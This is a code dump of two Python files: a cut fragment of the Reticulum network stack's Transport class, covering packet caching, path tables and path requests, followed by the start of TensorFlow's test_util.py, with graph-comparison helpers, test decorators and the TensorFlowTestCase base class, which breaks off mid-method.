link.status = RNS.Link.ACTIVE
else:
RNS.log("Attempted to activate a link that was not in the pending table", RNS.LOG_ERROR)
@staticmethod
def register_announce_handler(handler):
"""
Registers an announce handler.
:param handler: Must be an object with an *aspect_filter* attribute and a *received_announce(destination_hash, announced_identity, app_data)* callable. See the :ref:`Announce Example<example-announce>` for more info.
"""
if hasattr(handler, "received_announce") and callable(handler.received_announce):
if hasattr(handler, "aspect_filter"):
Transport.announce_handlers.append(handler)
@staticmethod
def deregister_announce_handler(handler):
"""
Deregisters an announce handler.
:param handler: The announce handler to be deregistered.
"""
while handler in Transport.announce_handlers:
Transport.announce_handlers.remove(handler)
@staticmethod
def find_interface_from_hash(interface_hash):
for interface in Transport.interfaces:
if interface.get_hash() == interface_hash:
return interface
return None
@staticmethod
def should_cache(packet):
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
return False
# When caching packets to storage, they are written
# exactly as they arrived over their interface. This
# means that they have not had their hop count
# increased yet! Take note of this when reading from
# the packet cache.
@staticmethod
def cache(packet, force_cache=False):
if RNS.Transport.should_cache(packet) or force_cache:
try:
packet_hash = RNS.hexrep(packet.get_hash(), delimit=False)
interface_reference = None
if packet.receiving_interface != None:
interface_reference = str(packet.receiving_interface)
file = open(RNS.Reticulum.cachepath+"/"+packet_hash, "wb")
file.write(umsgpack.packb([packet.raw, interface_reference]))
file.close()
except Exception as e:
RNS.log("Error writing packet to cache", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e))
@staticmethod
def get_cached_packet(packet_hash):
try:
packet_hash = RNS.hexrep(packet_hash, delimit=False)
path = RNS.Reticulum.cachepath+"/"+packet_hash
if os.path.isfile(path):
file = open(path, "rb")
cached_data = umsgpack.unpackb(file.read())
file.close()
packet = RNS.Packet(None, cached_data[0])
interface_reference = cached_data[1]
for interface in Transport.interfaces:
if str(interface) == interface_reference:
packet.receiving_interface = interface
return packet
else:
return None
except Exception as e:
RNS.log("Exception occurred while getting cached packet.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def cache_request_packet(packet):
if len(packet.data) == RNS.Identity.HASHLENGTH/8:
packet = Transport.get_cached_packet(packet.data)
if packet != None:
# If the packet was retrieved from the local
# cache, replay it to the Transport instance,
# so that it can be directed towards it original
# destination.
Transport.inbound(packet.raw, packet.receiving_interface)
return True
else:
return False
else:
return False
@staticmethod
def cache_request(packet_hash, destination):
cached_packet = Transport.get_cached_packet(packet_hash)
if cached_packet:
# The packet was found in the local cache,
# replay it to the Transport instance.
Transport.inbound(packet.raw, packet.receiving_interface)
else:
# The packet is not in the local cache,
# query the network.
RNS.Packet(destination, packet_hash, context = RNS.Packet.CACHE_REQUEST).send()
@staticmethod
def has_path(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: *True* if a path to the destination is known, otherwise *False*.
"""
if destination_hash in Transport.destination_table:
return True
else:
return False
@staticmethod
def hops_to(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The number of hops to the specified destination, or ``RNS.Transport.PATHFINDER_M`` if the number of hops is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][2]
else:
return Transport.PATHFINDER_M
@staticmethod
def next_hop(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The destination hash as *bytes* for the next hop to the specified destination, or *None* if the next hop is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][1]
else:
return None
@staticmethod
def next_hop_interface(destination_hash):
"""
:param destination_hash: A destination hash as *bytes*.
:returns: The interface for the next hop to the specified destination, or *None* if the interface is unknown.
"""
if destination_hash in Transport.destination_table:
return Transport.destination_table[destination_hash][5]
else:
return None
@staticmethod
def request_path(destination_hash):
"""
Requests a path to the destination from the network. If
another reachable peer on the network knows a path, it
will announce it.
:param destination_hash: A destination hash as *bytes*.
"""
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1)
packet.send()
@staticmethod
def request_path_on_interface(destination_hash, interface):
path_request_data = destination_hash + RNS.Identity.get_random_hash()
path_request_dst = RNS.Destination(None, RNS.Destination.OUT, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
packet = RNS.Packet(path_request_dst, path_request_data, packet_type = RNS.Packet.DATA, transport_type = RNS.Transport.BROADCAST, header_type = RNS.Packet.HEADER_1, attached_interface = interface)
packet.send()
@staticmethod
def path_request_handler(data, packet):
try:
if len(data) >= RNS.Identity.TRUNCATED_HASHLENGTH//8:
Transport.path_request(
data[:RNS.Identity.TRUNCATED_HASHLENGTH//8],
Transport.from_local_client(packet),
packet.receiving_interface
)
except Exception as e:
RNS.log("Error while handling path request. The contained exception was: "+str(e), RNS.LOG_ERROR)
@staticmethod
def path_request(destination_hash, is_from_local_client, attached_interface):
RNS.log("Path request for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
local_destination = next((d for d in Transport.destinations if d.hash == destination_hash), None)
if local_destination != None:
RNS.log("Destination is local to this system, announcing", RNS.LOG_DEBUG)
local_destination.announce(path_response=True)
elif (RNS.Reticulum.transport_enabled() or is_from_local_client or len(Transport.local_client_interfaces) > 0) and destination_hash in Transport.destination_table:
RNS.log("Path found, inserting announce for transmission", RNS.LOG_DEBUG)
packet = Transport.destination_table[destination_hash][6]
received_from = Transport.destination_table[destination_hash][5]
now = time.time()
retries = Transport.PATHFINDER_R
local_rebroadcasts = 0
block_rebroadcasts = True
announce_hops = packet.hops
if is_from_local_client:
retransmit_timeout = now
else:
# TODO: Look at this timing
retransmit_timeout = now + Transport.PATH_REQUEST_GRACE # + (RNS.rand() * Transport.PATHFINDER_RW)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if packet.destination_hash in Transport.announce_table:
held_entry = Transport.announce_table[packet.destination_hash]
Transport.held_announces[packet.destination_hash] = held_entry
Transport.announce_table[packet.destination_hash] = [now, retransmit_timeout, retries, received_from, announce_hops, packet, local_rebroadcasts, block_rebroadcasts, attached_interface]
elif is_from_local_client:
# Forward path request on all interfaces
# except the local client
for interface in Transport.interfaces:
if not interface == attached_interface:
Transport.request_path_on_interface(destination_hash, interface)
elif not is_from_local_client and len(Transport.local_client_interfaces) > 0:
# Forward the path request on all local
# client interfaces
for interface in Transport.local_client_interfaces:
Transport.request_path_on_interface(destination_hash, interface)
else:
RNS.log("No known path to requested destination, ignoring request", RNS.LOG_DEBUG)
@staticmethod
def from_local_client(packet):
if hasattr(packet.receiving_interface, "parent_interface"):
return Transport.is_local_client_interface(packet.receiving_interface)
else:
return False
@staticmethod
def is_local_client_interface(interface):
if hasattr(interface, "parent_interface"):
if hasattr(interface.parent_interface, "is_local_shared_instance"):
return True
else:
return False
else:
return False
@staticmethod
def interface_to_shared_instance(interface):
if hasattr(interface, "is_connected_to_shared_instance"):
return True
else:
return False
@staticmethod
def detach_interfaces():
for interface in Transport.interfaces:
interface.detach()
for interface in Transport.local_client_interfaces:
interface.detach()
@staticmethod
def exit_handler():
try:
if not RNS.Reticulum.transport_enabled():
Transport.packet_hashlist = []
else:
RNS.log("Saving packet hashlist to storage...", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
file = open(packet_hashlist_path, "wb")
file.write(umsgpack.packb(Transport.packet_hashlist))
file.close()
except Exception as e:
RNS.log("Could not save packet hashlist to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if not Transport.owner.is_connected_to_shared_instance:
RNS.log("Saving path table to storage...", RNS.LOG_VERBOSE)
try:
serialised_destinations = []
for destination_hash in Transport.destination_table:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
interface_hash = de[5].get_hash()
# Only store destination table entry if the associated
# interface is still active
interface = Transport.find_interface_from_hash(interface_hash)
if interface != None:
# Get the destination entry from the destination table
de = Transport.destination_table[destination_hash]
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_destinations.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
file = open(destination_table_path, "wb")
file.write(umsgpack.packb(serialised_destinations))
file.close()
RNS.log("Done saving "+str(len(serialised_destinations))+" path table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save path table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Saving tunnel table to storage...", RNS.LOG_VERBOSE)
try:
serialised_tunnels = []
for tunnel_id in Transport.tunnels:
te = Transport.tunnels[tunnel_id]
interface = te[1]
tunnel_paths = te[2]
expires = te[3]
if interface != None:
interface_hash = interface.get_hash()
else:
interface_hash = None
serialised_paths = []
for destination_hash in tunnel_paths:
de = tunnel_paths[destination_hash]
timestamp = de[0]
received_from = de[1]
hops = de[2]
expires = de[3]
random_blobs = de[4]
packet_hash = de[6].get_hash()
serialised_entry = [
destination_hash,
timestamp,
received_from,
hops,
expires,
random_blobs,
interface_hash,
packet_hash
]
serialised_paths.append(serialised_entry)
Transport.cache(de[6], force_cache=True)
serialised_tunnel = [tunnel_id, interface_hash, serialised_paths, expires]
serialised_tunnels.append(serialised_tunnel)
tunnels_path = RNS.Reticulum.storagepath+"/tunnels"
file = open(tunnels_path, "wb")
file.write(umsgpack.packb(serialised_tunnels))
file.close()
RNS.log("Done saving "+str(len(serialised_tunnels))+" tunnel table entries to storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not save tunnel table to storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API: return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error(
"Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s" % (_safe_object_str(obj),))
logging.error(" Referrer types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referrers(obj)]),))
logging.error(" Referent types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referents(obj)]),))
logging.error(" Object attribute names: %s" % (dir(obj),))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
